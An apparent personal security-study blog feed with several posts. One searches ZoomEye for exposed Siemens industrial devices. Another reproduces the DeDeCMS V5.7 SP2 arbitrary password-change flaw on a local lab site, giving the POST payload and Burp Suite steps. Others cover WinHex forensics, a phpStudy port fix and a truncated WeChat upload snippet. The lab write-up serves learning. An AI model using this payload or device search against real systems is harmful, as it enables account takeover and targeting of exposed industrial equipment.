id="用ZoomEye查询设备安全问题"><a href="#用ZoomEye查询设备安全问题" class="headerlink" title="用ZoomEye查询设备安全问题"></a>用ZoomEye查询设备安全问题</h3><p>首先搜索西门子公司的工控设备,我这里搜索了两个</p><p><strong>① PLC</strong></p><p><img src="https://img-blog.csdnimg.cn/2020110321591113.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img 
src="https://img-blog.csdnimg.cn/20201103220709439.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>② app:”Siemens Building Technologies Climatix WEB Server”</strong></p><p><img src="https://img-blog.csdnimg.cn/20201103220635525.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201103220552460.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="Winhex简单数据恢复和取证"><a href="#Winhex简单数据恢复和取证" class="headerlink" title="Winhex简单数据恢复和取证"></a>Winhex简单数据恢复和取证</h3><h4 id="WinHex修复图片"><a href="#WinHex修复图片" class="headerlink" title="WinHex修复图片"></a>WinHex修复图片</h4><p>elephant.jpg不能打开了,利用WinHex修复<br>这是elephant.jpg原本的预览样式<br><img src="https://img-blog.csdnimg.cn/20201101224247756.jpg#pic_center" alt="在这里插入图片描述"></p><p>用WinHex打开elephant.jpg发现二进制的文件开头为<strong>00 00</strong>,不符合正常<strong>FF D8</strong>格式</p><p><img src="https://img-blog.csdnimg.cn/20201101224752333.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>所以改为<strong>FF D8</strong></p><p><img src="https://img-blog.csdnimg.cn/20201101225013655.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>另存为jpg文件,修复图片得(因为原图太大,我截图上传的)</p><p><img src="https://img-blog.csdnimg.cn/20201101225253644.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" 
alt="在这里插入图片描述"></p><h4 id="WinHex修复图片-1"><a href="#WinHex修复图片-1" class="headerlink" title="WinHex修复图片"></a>Repairing an image with WinHex</h4><p>Find the information hidden in the smiley-face picture.</p><p><strong>Original smiley image</strong><br><img src="https://img-blog.csdnimg.cn/20201101225433194.bmp#pic_center" alt="在这里插入图片描述"><br>Open the smile image in WinHex and scroll to the end of the file to find the hidden message <strong>tom is the killer</strong>.</p><p><img src="https://img-blog.csdnimg.cn/20201101225558887.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="U盘数据恢复"><a href="#U盘数据恢复" class="headerlink" title="U盘数据恢复"></a>USB drive data recovery</h4><p>There is not much technique here: find recovery software online, scan the USB drive and recover the files. These are the tools I tried.</p><p><img src="https://img-blog.csdnimg.cn/20201103213136194.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201103213155572.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/2020110321320996.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>The trial version won't do it; you have to pay for VIP……</p><p>Next one</p><p><img src="https://img-blog.csdnimg.cn/20201103213314716.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201103213322935.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img 
src="https://img-blog.csdnimg.cn/20201103213341652.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Not free either……</p>]]></content>
<summary type="html"><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>Experiment objectives</h2><ul>
<li>Understand the purpose of Network scanning&amp;Network investigation; by setting up Netw</summary>
<category term="Network Penetration" scheme="http://example.com/categories/Network-Penetration/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>DeDeCMS v5.7 SP2 official release: reproducing the front-end arbitrary user password change vulnerability</title>
<link href="http://example.com/2020/10/24/DeceCMS%20v5.7%20SP2%E6%AD%A3%E5%BC%8F%E7%89%88%E5%89%8D%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BF%AE%E6%94%B9%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E4%BF%AE%E6%94%B9%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"/>
<id>http://example.com/2020/10/24/DeceCMS%20v5.7%20SP2%E6%AD%A3%E5%BC%8F%E7%89%88%E5%89%8D%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BF%AE%E6%94%B9%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E4%BF%AE%E6%94%B9%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/</id>
<published>2020-10-24T14:24:04.000Z</published>
<updated>2022-03-18T06:03:46.012Z</updated>
<content type="html"><![CDATA[<h2 id="一、漏洞限制"><a href="#一、漏洞限制" class="headerlink" title="一、漏洞限制"></a>1. Limitations of the vulnerability</h2><p>1. It only affects front-end accounts<br>2. It can only change accounts that have no security question set</p><h2 id="二、影响版本"><a href="#二、影响版本" class="headerlink" title="二、影响版本"></a>2. Affected version</h2><p>DeDeCMS V5.7 SP2 official release (2018-01-09)</p><h2 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>3. Reproducing the vulnerability</h2><h3 id="复现环境"><a href="#复现环境" class="headerlink" title="复现环境"></a>Test environment</h3><p> PHP 5.6<br> DeDeCMS V5.7 SP2 official release (2018-01-09)</p><h3 id="复现工具"><a href="#复现工具" class="headerlink" title="复现工具"></a>Tools</h3><p> ① <a href="http://www.dedecms.com/products/dedecms/downloads/">DeDeCMS V5.7 SP2 official release (2018-01-09)</a><br> ② HackBar / Max HacKBar extension (the latter is Firefox only)<br> ③ Proxy SwitchyOmega extension<br> ④ Burp Suite, for intercepting traffic<br> ⑤ phpstudypro, for hosting the site<br> ⑥ Google Chrome / Firefox browser</p><h3 id="复现过程"><a href="#复现过程" class="headerlink" title="复现过程"></a>Reproduction steps</h3><h4 id="用phpstudypro建站"><a href="#用phpstudypro建站" class="headerlink" title="用phpstudypro建站"></a>Setting up the site with phpstudypro</h4><p> (You don't have to use this tool to set up the site.)<br> Setting up a site with this tool is simple: just start the Apache and MySQL services, as shown:</p><p> <img src="https://img-blog.csdnimg.cn/20201024200805926.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" title="建站套件"></p><p>You can also create a domain name, as shown:</p><p><img src="https://img-blog.csdnimg.cn/20201024200935495.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" title="建站域名"></p><p>Enter the domain name you want in the first field, e.g. <a href="http://www.xxxxx.com/">www.xxxxx.com</a>.<br><strong>I have gone through the following steps both with the IP address and with a domain name, and found the domain name more convenient; details follow later.</strong></p><p><em>If the MySQL database starts and then shuts down again after a moment, see my other <a href="https://blog.csdn.net/Reaper_MXBG/article/details/109081140">blog post</a>, which explains it in detail.</em></p><h4 id="安装DeDeCMS"><a href="#安装DeDeCMS" class="headerlink" 
title="安装DeDeCMS"></a>Installing DeDeCMS</h4><p>The steps are as follows.<br>1. After downloading, move the uploads folder into the WWW folder under phpstudy_pro (if you use a domain name, put uploads in the folder named after the domain).</p><p>The uploads folder<br><img src="https://img-blog.csdnimg.cn/20201024204359181.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" title="uploads文件夹"><br>Whether you use the IP address or a domain name, put the uploads folder under the WWW folder, at the same level as index.html.</p><p><img src="https://img-blog.csdnimg.cn/20201024204615907.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Then, if you use the IP address, visit <a href="http://127.0.0.1/uploads/install/index.php">http://127.0.0.1/uploads/install/index.php</a><br>If you use a domain name, visit <a href="http://www.week3.com/uploads/install/index.php">http://www.week3.com/uploads/install/index.php</a><br><strong>Remember that my links match my local paths; don't copy them verbatim.</strong><br>You will see the screen shown below.</p><p><img src="https://img-blog.csdnimg.cn/20201024210427119.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Continue</p><p><img src="https://img-blog.csdnimg.cn/20201024210549922.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Continue</p><p><img src="https://img-blog.csdnimg.cn/20201024210621473.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>At this step, pay attention to the database password and the administrator password; setting each to match its account name is usually enough and makes them easy to remember.</p><p>Continue</p><p><img src="https://img-blog.csdnimg.cn/20201024210847764.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" 
alt="在这里插入图片描述"></p><p>Log in to the admin back end (<strong>save this link; you will need it later</strong>).</p><p><img src="https://img-blog.csdnimg.cn/20201024211016524.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Set this option to "Yes" here, otherwise members cannot register.<br>Next:</p><p><img src="https://img-blog.csdnimg.cn/20201024211431637.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>This site configuration is a key step: change the original IP to the <strong>IPv4 address of your wireless LAN adapter (WLAN)</strong>. I am not sure of the exact reason; a friend told me that with the 127.0.0.1 address the requests keep looping and Burp Suite cannot capture them, so I replaced the IP in all later URLs with my local IP.</p><h5 id="0x02-设置代理"><a href="#0x02-设置代理" class="headerlink" title="0x02 设置代理"></a>0x02 Setting up the proxy</h5><p>To capture traffic you need a proxy, using the Proxy SwitchyOmega extension, which is available for both Chrome and Firefox; download it yourself. Set the IP to 127.0.0.1 and the port to 8080. I won't walk through it, it is simple: just enter the values in the proxy profile.</p><p><img src="https://img-blog.csdnimg.cn/20201024212338559.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>All later browsing must go through this proxy; select the option shown.</strong></p><p><img src="https://img-blog.csdnimg.cn/20201024215337834.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="Burp-Suite的准备"><a href="#Burp-Suite的准备" class="headerlink" title="Burp Suite的准备"></a>Preparing Burp Suite</h4><p>For installation I recommend this <a href="https://blog.csdn.net/LUOBIKUN/article/details/87457545?utm_source=app">blog post</a>. Use an install path without Chinese characters, since a path containing them is likely to cause problems.<br>After installation comes capturing traffic. Start Burp and go through three steps.</p><p>Leave</p><p><img src="https://img-blog.csdnimg.cn/20201024213036249.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Next</p><p><img 
src="https://img-blog.csdnimg.cn/20201024213102509.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Start Burp</p><p><img src="https://img-blog.csdnimg.cn/20201024213126709.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Then go to "Proxy → Intercept" and leave it in the "Intercept is off" state.</p><p><img src="https://img-blog.csdnimg.cn/20201024213304372.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="后续操作"><a href="#后续操作" class="headerlink" title="后续操作"></a>Remaining steps</h4><p>Go to the site's home page and register an account.</p><p><img src="https://img-blog.csdnimg.cn/2020102421425923.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Remember to choose "no security question" for the security question.</p><p>After registering, open the admin back-end URL you saved earlier to look up the id of the registered member, which is the mid value. I registered two accounts, so the mid of my test account (the account name is arbitrary) is 3. <strong>Remember this id; you will need it later.</strong></p><p>Next you need HackBar. The Chrome HackBar needs to be cracked, and I couldn't be bothered with the crack for the Firefox HackBar either, so I just use the Firefox Max HacKBar extension, which works almost the same as HackBar.</p><p><img src="https://img-blog.csdnimg.cn/20201024215739223.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>Following the steps in the screenshot, click Load first, then Post data, then paste dopost=safequestion&safequestion=0.0&safeanswer=&id= your user id<br>into the box, where id is the id of the user you registered (the one you were told to remember). Don't rush to click Execution yet: remember the Burp instance we left in the "Intercept is off" state? Switch it to "Intercept is on", and then click "Execution". You will now see the Burp window change.</p><p><img src="https://img-blog.csdnimg.cn/20201024220303625.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" 
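alt="在这里插入图片描述"></p><p>This is not the screen we want. Click Forward, possibly several times, until you see the screen below.</p><p><img src="https://img-blog.csdnimg.cn/20201024220400360.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>This key is what we need. Copy the key=…… part and append &key=…… after the original id=2, as shown.</p><p><img src="https://img-blog.csdnimg.cn/20201024220927930.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>(Never mind that the key in this screenshot differs from the captured one; I didn't take the screenshots in one go……)<br>Alternatively, don't copy the key and just keep clicking Forward; the address bar will end up with a link that contains the key, but you need to delete the extra 'amp;' so that the link has the same format as in the screenshot above.</p><p>If the browser cannot open the link, switch to another browser, but don't forget to enable the proxy there too.</p><p>Then set any password and you will find that login succeeds.</p><p><img src="https://img-blog.csdnimg.cn/20201024221319251.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>That is the whole process of reproducing this vulnerability.</p>]]></content>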
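<summary type="html"><h2 id="一、漏洞限制"><a href="#一、漏洞限制" class="headerlink" title="一、漏洞限制"></a>1. Limitations of the vulnerability</h2><p>1. It only affects front-end accounts<br>2. It can only change accounts that have no security question set</p>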
<h2 id="二、影响版本"><a </summary>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>Fixing the phpStudy Pro database that starts and then shuts down after a moment</title>
<link href="http://example.com/2020/10/14/phpStudy%20Pro%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%AF%E5%8A%A8%E4%B8%80%E4%BC%9A%E5%84%BF%E5%8F%88%E5%85%B3%E9%97%AD%E7%9A%84%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95/"/>
<id>http://example.com/2020/10/14/phpStudy%20Pro%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%AF%E5%8A%A8%E4%B8%80%E4%BC%9A%E5%84%BF%E5%8F%88%E5%85%B3%E9%97%AD%E7%9A%84%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95/</id>
<published>2020-10-14T11:50:09.000Z</published>
<updated>2022-03-18T06:03:46.018Z</updated>
<content type="html"><![CDATA[<h2 id="问题本质"><a href="#问题本质" class="headerlink" title="问题本质"></a>Root cause</h2><p>The root cause of this problem is that the port is already in use (at least that was the case for me).</p><h2 id="解决方法步骤"><a href="#解决方法步骤" class="headerlink" title="解决方法步骤"></a>Steps to fix it</h2><h3 id="打开界面上mysql的配置"><a href="#打开界面上mysql的配置" class="headerlink" title="打开界面上mysql的配置"></a>Open the MySQL configuration in the UI</h3><p>As shown:</p><p><img src="https://img-blog.csdnimg.cn/20201014192538904.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="MYSQL配置" title="MYSQL配置界面"></p><h3 id="打开错误日志选项"><a href="#打开错误日志选项" class="headerlink" title="打开错误日志选项"></a>Open the error log option</h3><p><img src="https://img-blog.csdnimg.cn/20201014192743692.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center%22%E9%94%99%E8%AF%AF%E6%97%A5%E5%BF%97%E8%B7%AF%E5%BE%84%22" alt="错误日志路径"></p><h3 id="通过路径找到错误日志"><a href="#通过路径找到错误日志" class="headerlink" title="通过路径找到错误日志"></a>Find the error log via its path</h3><p><img src="https://img-blog.csdnimg.cn/20201014192929842.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="ibdata1.err文件" title="ibdata1.err"></p><h3 id="打开错误日志发现问题所在——端口占用"><a href="#打开错误日志发现问题所在——端口占用" class="headerlink" title="打开错误日志发现问题所在——端口占用"></a>Open the error log and find the problem: the port is in use</h3><p><img src="https://img-blog.csdnimg.cn/20201014193221415.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="3306端口被占用" title="3306端口被占用"></p><h3 id="解决端口占用"><a href="#解决端口占用" class="headerlink" title="解决端口占用"></a>Freeing the port</h3><p>Freeing a port is simple enough that I won't show screenshots (definitely not because I'm lazy!).<br>It only takes a few commands, but you must open cmd <strong>as administrator</strong>:</p><h4 id="查询占用端口的PID"><a href="#查询占用端口的PID" class="headerlink" title="查询占用端口的PID"></a>Find the PID that is using the port</h4><figure 
class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">netstat -ano|findstr <span class="number">3306</span></span><br><span class="line"><span class="comment">REM 3306 is the occupied port in my case; yours may differ</span></span><br></pre></td></tr></table></figure><h4 id="查询占用端口的程序"><a href="#查询占用端口的程序" class="headerlink" title="查询占用端口的程序"></a>Find the program that is using the port</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tasklist|findstr <span class="string">"25484"</span></span><br><span class="line"><span class="comment">REM 25484 is my PID; again, yours will differ, haha</span></span><br></pre></td></tr></table></figure><p>The lookup shows that the program holding the port is the MySQL database (I think it is usually a database you set up earlier that is occupying it).</p><p><img src="https://img-blog.csdnimg.cn/2020101419402559.jpg#pic_center" alt="占用端口的程序" title="mysqld占用端口"></p><h3 id="释放它!"><a href="#释放它!" 
class="headerlink" title="释放它!"></a>Free it!</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">REM you can kill the process directly by PID</span></span><br><span class="line">taskkill /pid <span class="number">25484</span> /t /f</span><br><span class="line"><span class="comment">REM or terminate the corresponding program by image name</span></span><br><span class="line">taskkill /f /t /im mysqld.<span class="property">exe</span></span><br></pre></td></tr></table></figure><p>Result</p><p><img src="https://img-blog.csdnimg.cn/20201014194542110.jpg#pic_center" alt="程序终止" title="程序终止"><br><img src="https://img-blog.csdnimg.cn/20201014194634611.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="大功告成" title="大功告成"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>Learn to find the error log, and learn to use the internet wisely (look for the answer online first and worry only if you can't find it, hahaha).</p>]]></content>
<summary type="html"><h2 id="问题本质"><a href="#问题本质" class="headerlink" title="问题本质"></a>Root cause</h2><p>The root cause of this problem is that the port is already in use (at least that was the case for me).</p>
<h2 id="解决方法步骤"><a href="#解决</summary>
<category term="note" scheme="http://example.com/tags/note/"/>
<category term="solution" scheme="http://example.com/tags/solution/"/>
</entry>
<entry>
<title>Taking a photo with the camera and uploading it</title>
<link href="http://example.com/2020/04/15/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94%E8%B0%83%E7%94%A8%E6%91%84%E5%83%8F%E5%A4%B4%E6%8B%8D%E7%85%A7%E4%B8%8A%E4%BC%A0%20%E5%90%8E%E7%AB%AF%EF%BC%9Anode.js/"/>
<id>http://example.com/2020/04/15/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94%E8%B0%83%E7%94%A8%E6%91%84%E5%83%8F%E5%A4%B4%E6%8B%8D%E7%85%A7%E4%B8%8A%E4%BC%A0%20%E5%90%8E%E7%AB%AF%EF%BC%9Anode.js/</id>
<published>2020-04-15T06:54:59.000Z</published>
<updated>2022-03-18T06:03:46.022Z</updated>
<content type="html"><![CDATA[<h2 id="前端部分"><a href="#前端部分" class="headerlink" title="前端部分"></a>Front end</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">///.wxml</span></span><br><span class="line"><view <span class="keyword">class</span>=<span class="string">"tui-picker-content"</span>></span><br><span class="line"><span class="language-xml"><span class="tag"><<span class="name">button</span> <span class="attr">bindtap</span>=<span class="string">"submitImage"</span>></span>提交照片<span class="tag"></<span class="name">button</span>></span></span></span><br><span class="line"></view></span><br></pre></td></tr></table></figure><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span 
class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//js</span></span><br><span class="line"><span class="attr">submitImage</span>:<span class="keyword">function</span>(<span class="params">e</span>){</span><br><span class="line">  <span class="keyword">var</span> that = <span class="variable language_">this</span>;</span><br><span class="line">  <span class="keyword">var</span> roomID = that.<span class="property">data</span>.<span class="property">roomID</span>;</span><br><span class="line">  wx.<span class="title function_">chooseImage</span>({</span><br><span class="line">    <span class="attr">count</span>: <span class="number">1</span>,</span><br><span class="line">    <span class="attr">sizeType</span>: [<span class="string">'original'</span>],</span><br><span class="line">    <span class="attr">sourceType</span>: [<span class="string">'album'</span>, <span class="string">'camera'</span>],</span><br><span class="line">    <span class="attr">success</span>: <span class="function">(<span class="params">res</span>) =></span> {</span><br><span class="line">      <span class="keyword">const</span> tempFilePaths = res.<span class="property">tempFilePaths</span>[<span class="number">0</span>]</span><br><span class="line">      that.<span class="title function_">setData</span>({</span><br><span class="line">        <span class="attr">imgSrc</span>: tempFilePaths</span><br><span class="line">      });</span><br><span class="line">      wx.<span class="title function_">uploadFile</span>({</span><br><span class="line">        <span class="attr">url</span>: <span class="string">'https://www.xxxxxx.com/img'</span>, <span class="comment">//server endpoint URL</span></span><br><span class="line">        <span 